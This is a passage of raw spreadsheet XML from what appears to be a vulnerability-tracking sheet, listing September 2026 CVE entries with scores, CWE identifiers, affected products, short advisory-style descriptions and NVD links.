t="inlineStr" /><c r="J282" s="5" t="inlineStr" /><c r="K282" s="5" t="inlineStr" /><c r="L282" s="5" t="inlineStr" /><c r="M282" s="5" t="inlineStr" /><c r="N282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P282" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q282" s="5" t="inlineStr" /><c r="R282" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S282" s="5" t="inlineStr"><is><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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t></is></c></row><row r="283"><c r="A283" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C283" s="5" t="inlineStr"><is><t>CVE-2026-75991</t></is></c><c r="D283" s="5" t="n"><v>8.6</v></c><c r="E283" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F283" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G283" s="5" t="inlineStr" /><c r="H283" s="5" t="n"><v>0.002</v></c><c r="I283" s="5" t="inlineStr" /><c r="J283" s="5" t="inlineStr" /><c r="K283" s="5" t="inlineStr" /><c r="L283" s="5" t="inlineStr" /><c r="M283" s="5" t="inlineStr" /><c r="N283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P283" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q283" s="5" t="inlineStr" /><c r="R283" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S283" s="5" t="inlineStr"><is><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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t></is></c></row><row r="284"><c r="A284" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C284" s="5" t="inlineStr"><is><t>CVE-2026-76190</t></is></c><c r="D284" s="5" t="n"><v>8.6</v></c><c r="E284" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F284" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G284" s="5" t="inlineStr" /><c r="H284" s="5" t="n"><v>0.01</v></c><c r="I284" s="5" t="inlineStr" /><c r="J284" s="5" t="inlineStr" /><c r="K284" s="5" t="inlineStr" /><c r="L284" s="5" t="inlineStr" /><c r="M284" s="5" t="inlineStr" /><c r="N284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P284" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q284" s="5" t="inlineStr" /><c r="R284" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S284" s="5" t="inlineStr"><is><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is></c><c r="T284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t></is></c></row><row r="285"><c r="A285" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C285" s="5" t="inlineStr"><is><t>CVE-2026-76199</t></is></c><c r="D285" s="5" t="n"><v>8.6</v></c><c r="E285" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F285" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G285" s="5" t="inlineStr" /><c r="H285" s="5" t="n"><v>0.002</v></c><c r="I285" s="5" t="inlineStr" /><c r="J285" s="5" t="inlineStr" /><c r="K285" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L285" s="5" t="inlineStr" /><c r="M285" s="5" t="inlineStr" /><c r="N285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P285" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q285" s="5" t="inlineStr" /><c r="R285" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S285" s="5" t="inlineStr"><is><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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t></is></c></row><row r="286"><c r="A286" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C286" s="5" t="inlineStr"><is><t>CVE-2026-77109</t></is></c><c r="D286" s="5" t="n"><v>8.6</v></c><c r="E286" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F286" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G286" s="5" t="inlineStr" /><c r="H286" s="5" t="n"><v>0.004</v></c><c r="I286" s="5" t="inlineStr" /><c r="J286" s="5" t="inlineStr" /><c r="K286" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L286" s="5" t="inlineStr" /><c r="M286" s="5" t="inlineStr" /><c r="N286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P286" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q286" s="5" t="inlineStr" /><c r="R286" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S286" s="5" t="inlineStr"><is><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is></c><c r="T286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t></is></c></row><row r="287"><c r="A287" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C287" s="5" t="inlineStr"><is><t>CVE-2026-77774</t></is></c><c r="D287" s="5" t="n"><v>8.6</v></c><c r="E287" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G287" s="5" t="inlineStr" /><c r="H287" s="5" t="n"><v>0.005</v></c><c r="I287" s="5" t="inlineStr" /><c r="J287" s="5" t="inlineStr" /><c r="K287" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L287" s="5" t="inlineStr" /><c r="M287" s="5" t="inlineStr" /><c r="N287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P287" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q287" s="5" t="inlineStr" /><c r="R287" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S287" s="5" t="inlineStr"><is><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is></c><c r="T287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t></is></c></row><row r="288"><c r="A288" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C288" s="5" t="inlineStr"><is><t>CVE-2026-79721</t></is></c><c r="D288" s="5" t="n"><v>8.6</v></c><c r="E288" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F288" s="5" t="inlineStr"><is><t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t></is></c><c r="G288" s="5" t="inlineStr" /><c r="H288" s="5" t="n"><v>0.003</v></c><c r="I288" s="5" t="inlineStr" /><c r="J288" s="5" t="inlineStr" /><c r="K288" s="5" t="inlineStr" /><c r="L288" s="5" t="inlineStr" /><c r="M288" s="5" t="inlineStr" /><c r="N288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P288" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q288" s="5" t="inlineStr" /><c r="R288" s="5" t="inlineStr"><is><t>CWE-829</t></is></c><c r="S288" s="5" t="inlineStr"><is><t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t></is></c><c r="T288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t></is></c></row><row r="289"><c r="A289" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C289" s="5" t="inlineStr"><is><t>CVE-2026-80097</t></is></c><c r="D289" s="5" t="n"><v>8.6</v></c><c r="E289" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G289" s="5" t="inlineStr" /><c r="H289" s="5" t="n"><v>0.004</v></c><c r="I289" s="5" t="inlineStr" /><c r="J289" s="5" t="inlineStr" /><c r="K289" s="5" t="inlineStr" /><c r="L289" s="5" t="inlineStr" /><c r="M289" s="5" t="inlineStr" /><c r="N289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P289" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q289" s="5" t="inlineStr" /><c r="R289" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S289" s="5" t="inlineStr"><is><t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t></is></c></row><row r="290"><c r="A290" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C290" s="5" t="inlineStr"><is><t>CVE-2026-86509</t></is></c><c r="D290" s="5" t="n"><v>8.6</v></c><c r="E290" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F290" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G290" s="5" t="inlineStr" /><c r="H290" s="5" t="n"><v>0.004</v></c><c r="I290" s="5" t="inlineStr" /><c r="J290" s="5" t="inlineStr" /><c r="K290" s="5" t="inlineStr" /><c r="L290" s="5" t="inlineStr" /><c r="M290" s="5" t="inlineStr" /><c r="N290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P290" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q290" s="5" t="inlineStr" /><c r="R290" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S290" s="5" t="inlineStr"><is><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is></c><c r="T290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t></is></c></row><row r="291"><c r="A291" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C291" s="5" t="inlineStr"><is><t>CVE-2026-86510</t></is></c><c r="D291" s="5" t="n"><v>8.6</v></c><c r="E291" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F291" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G291" s="5" t="inlineStr" /><c r="H291" s="5" t="n"><v>0.005</v></c><c r="I291" s="5" t="inlineStr" /><c r="J291" s="5" t="inlineStr" /><c r="K291" s="5" t="inlineStr" /><c r="L291" s="5" t="inlineStr" /><c r="M291" s="5" t="inlineStr" /><c r="N291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q291" s="5" t="inlineStr" /><c r="R291" s="5" t="inlineStr"><is><t>CWE-119, CWE-787</t></is></c><c r="S291" s="5" t="inlineStr"><is><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is></c><c r="T291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t></is></c></row><row r="292"><c r="A292" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C292" s="5" t="inlineStr"><is><t>CVE-2026-86712</t></is></c><c r="D292" s="5" t="n"><v>8.6</v></c><c r="E292" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F292" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G292" s="5" t="inlineStr" /><c r="H292" s="5" t="n"><v>0.004</v></c><c r="I292" s="5" t="inlineStr" /><c r="J292" s="5" t="inlineStr" /><c r="K292" s="5" t="inlineStr" /><c r="L292" s="5" t="inlineStr" /><c r="M292" s="5" t="inlineStr" /><c r="N292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P292" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q292" s="5" t="inlineStr" /><c r="R292" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S292" s="5" t="inlineStr"><is><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is></c><c r="T292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t></is></c></row><row r="293"><c r="A293" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C293" s="5" t="inlineStr"><is><t>CVE-2026-86722</t></is></c><c r="D293" s="5" t="n"><v>8.6</v></c><c r="E293" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F293" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G293" s="5" t="inlineStr" /><c r="H293" s="5" t="n"><v>0.003</v></c><c r="I293" s="5" t="inlineStr" /><c r="J293" s="5" t="inlineStr" /><c r="K293" s="5" t="inlineStr" /><c r="L293" s="5" t="inlineStr" /><c r="M293" s="5" t="inlineStr" /><c r="N293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P293" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q293" s="5" t="inlineStr" /><c r="R293" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S293" s="5" t="inlineStr"><is><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is></c><c r="T293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t></is></c></row><row r="294"><c r="A294" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C294" s="5" t="inlineStr"><is><t>CVE-2026-58113</t></is></c><c r="D294" s="5" t="n"><v>8.5</v></c><c r="E294" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F294" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G294" s="5" t="inlineStr" /><c r="H294" s="5" t="n"><v>0.002</v></c><c r="I294" s="5" t="inlineStr" /><c r="J294" s="5" t="inlineStr" /><c r="K294" s="5" t="inlineStr" /><c r="L294" s="5" t="inlineStr" /><c r="M294" s="5" t="inlineStr" /><c r="N294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P294" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q294" s="5" t="inlineStr" /><c r="R294" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S294" s="5" t="inlineStr"><is><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is></c><c r="T294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t></is></c></row><row r="295"><c r="A295" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C295" s="5" t="inlineStr"><is><t>CVE-2026-67378</t></is></c><c r="D295" s="5" t="n"><v>8.5</v></c><c r="E295" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G295" s="5" t="inlineStr" /><c r="H295" s="5" t="n"><v>0.005</v></c><c r="I295" s="5" t="inlineStr" /><c r="J295" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K295" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L295" s="5" t="inlineStr" /><c r="M295" s="5" t="inlineStr" /><c r="N295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P295" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q295" s="5" t="inlineStr" /><c r="R295" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S295" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t></is></c></row><row r="296"><c r="A296" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C296" s="5" t="inlineStr"><is><t>CVE-2026-67379</t></is></c><c r="D296" s="5" t="n"><v>8.5</v></c><c r="E296" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F296" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G296" s="5" t="inlineStr" /><c r="H296" s="5" t="n"><v>0.006</v></c><c r="I296" s="5" t="inlineStr" /><c r="J296" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K296" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L296" s="5" t="inlineStr" /><c r="M296" s="5" t="inlineStr" /><c r="N296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P296" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q296" s="5" t="inlineStr" /><c r="R296" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S296" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t></is></c></row><row r="297"><c r="A297" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C297" s="5" t="inlineStr"><is><t>CVE-2026-67636</t></is></c><c r="D297" s="5" t="n"><v>8.5</v></c><c r="E297" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G297" s="5" t="inlineStr" /><c r="H297" s="5" t="n"><v>0.005</v></c><c r="I297" s="5" t="inlineStr" /><c r="J297" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K297" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L297" s="5" t="inlineStr" /><c r="M297" s="5" t="inlineStr" /><c r="N297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P297" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q297" s="5" t="inlineStr" /><c r="R297" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S297" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t></is></c></row><row r="298"><c r="A298" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C298" s="5" t="inlineStr"><is><t>CVE-2026-74860</t></is></c><c r="D298" s="5" t="n"><v>8.5</v></c><c r="E298" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F298" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G298" s="5" t="inlineStr" /><c r="H298" s="5" t="n"><v>0.004</v></c><c r="I298" s="5" t="inlineStr" /><c r="J298" s="5" t="inlineStr" /><c r="K298" s="5" t="inlineStr" /><c r="L298" s="5" t="inlineStr" /><c r="M298" s="5" t="inlineStr" /><c r="N298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P298" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q298" s="5" t="inlineStr" /><c r="R298" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S298" s="5" t="inlineStr"><is><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is></c><c r="T298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t></is></c></row><row r="299"><c r="A299" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C299" s="5" t="inlineStr"><is><t>CVE-2026-75993</t></is></c><c r="D299" s="5" t="n"><v>8.5</v></c><c r="E299" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F299" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G299" s="5" t="inlineStr" /><c r="H299" s="5" t="n"><v>0.004</v></c><c r="I299" s="5" t="inlineStr" /><c r="J299" s="5" t="inlineStr" /><c r="K299" s="5" t="inlineStr" /><c r="L299" s="5" t="inlineStr" /><c r="M299" s="5" t="inlineStr" /><c r="N299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P299" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q299" s="5" t="inlineStr" /><c r="R299" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S299" s="5" t="inlineStr"><is><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is></c><c r="T299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t></is></c></row><row r="300"><c r="A300" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C300" s="5" t="inlineStr"><is><t>CVE-2026-76958</t></is></c><c r="D300" s="5" t="n"><v>8.5</v></c><c r="E300" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F300" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G300" s="5" t="inlineStr" /><c r="H300" s="5" t="n"><v>0.002</v></c><c r="I300" s="5" t="inlineStr" /><c r="J300" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K300" s="5" t="inlineStr" /><c r="L300" s="5" t="inlineStr" /><c r="M300" s="5" t="inlineStr" /><c r="N300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q300" s="5" t="inlineStr" /><c r="R300" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S300" s="5" t="inlineStr"><is><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is></c><c r="T300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t></is></c></row><row r="301"><c r="A301" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C301" s="5" t="inlineStr"><is><t>CVE-2026-85384</t></is></c><c r="D301" s="5" t="n"><v>8.5</v></c><c r="E301" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F301" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G301" s="5" t="inlineStr" /><c r="H301" s="5" t="n"><v>0.002</v></c><c r="I301" s="5" t="inlineStr" /><c r="J301" s="5" t="inlineStr" /><c r="K301" s="5" t="inlineStr" /><c r="L301" s="5" t="inlineStr" /><c r="M301" s="5" t="inlineStr" /><c r="N301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P301" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q301" s="5" t="inlineStr" /><c r="R301" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S301" s="5" t="inlineStr"><is><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is></c><c r="T301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t></is></c></row><row r="302"><c r="A302" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C302" s="5" t="inlineStr"><is><t>CVE-2026-69479</t></is></c><c r="D302" s="5" t="n"><v>8.4</v></c><c r="E302" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G302" s="5" t="inlineStr" /><c r="H302" s="5" t="n"><v>0.003</v></c><c r="I302" s="5" t="inlineStr" /><c r="J302" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K30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2" s="5" t="inlineStr" /><c r="M302" s="5" t="inlineStr" /><c r="N302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P302" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q302" s="5" t="inlineStr" /><c r="R302" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S302" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t></is></c></row><row r="303"><c r="A303" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C303" s="5" t="inlineStr"><is><t>CVE-2026-69638</t></is></c><c r="D303" s="5" t="n"><v>8.4</v></c><c r="E303" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G303" s="5" t="inlineStr" /><c r="H303" s="5" t="n"><v>0.003</v></c><c r="I303" s="5" t="inlineStr" /><c r="J303" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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3" s="5" t="inlineStr" /><c r="M303" s="5" t="inlineStr" /><c r="N303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P303" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q303" s="5" t="inlineStr" /><c r="R303" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S303" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t></is></c></row><row r="304"><c r="A304" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C304" s="5" t="inlineStr"><is><t>CVE-2026-75999</t></is></c><c r="D304" s="5" t="n"><v>8.4</v></c><c r="E304" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F304" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G304" s="5" t="inlineStr" /><c r="H304" s="5" t="n"><v>0.004</v></c><c r="I304" s="5" t="inlineStr" /><c r="J304" s="5" t="inlineStr" /><c r="K304" s="5" t="inlineStr" /><c r="L304" s="5" t="inlineStr" /><c r="M304" s="5" t="inlineStr" /><c r="N304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P304" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q304" s="5" t="inlineStr" /><c r="R304" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S304" s="5" t="inlineStr"><is><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is></c><c r="T304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t></is></c></row><row r="305"><c r="A305" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C305" s="5" t="inlineStr"><is><t>CVE-2026-77827</t></is></c><c r="D305" s="5" t="n"><v>8.4</v></c><c r="E305" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F305" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G305" s="5" t="inlineStr" /><c r="H305" s="5" t="n"><v>0.002</v></c><c r="I305" s="5" t="inlineStr" /><c r="J305" s="5" t="inlineStr" /><c r="K305" s="5" t="inlineStr" /><c r="L305" s="5" t="inlineStr" /><c r="M305" s="5" t="inlineStr" /><c r="N305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P305" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q305" s="5" t="inlineStr" /><c r="R305" s="5" t="inlineStr"><is><t>CWE-428</t></is></c><c r="S305" s="5" t="inlineStr"><is><t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t></is></c><c r="T305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t></is></c></row><row r="306"><c r="A306" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C306" s="5" t="inlineStr"><is><t>CVE-2026-86819</t></is></c><c 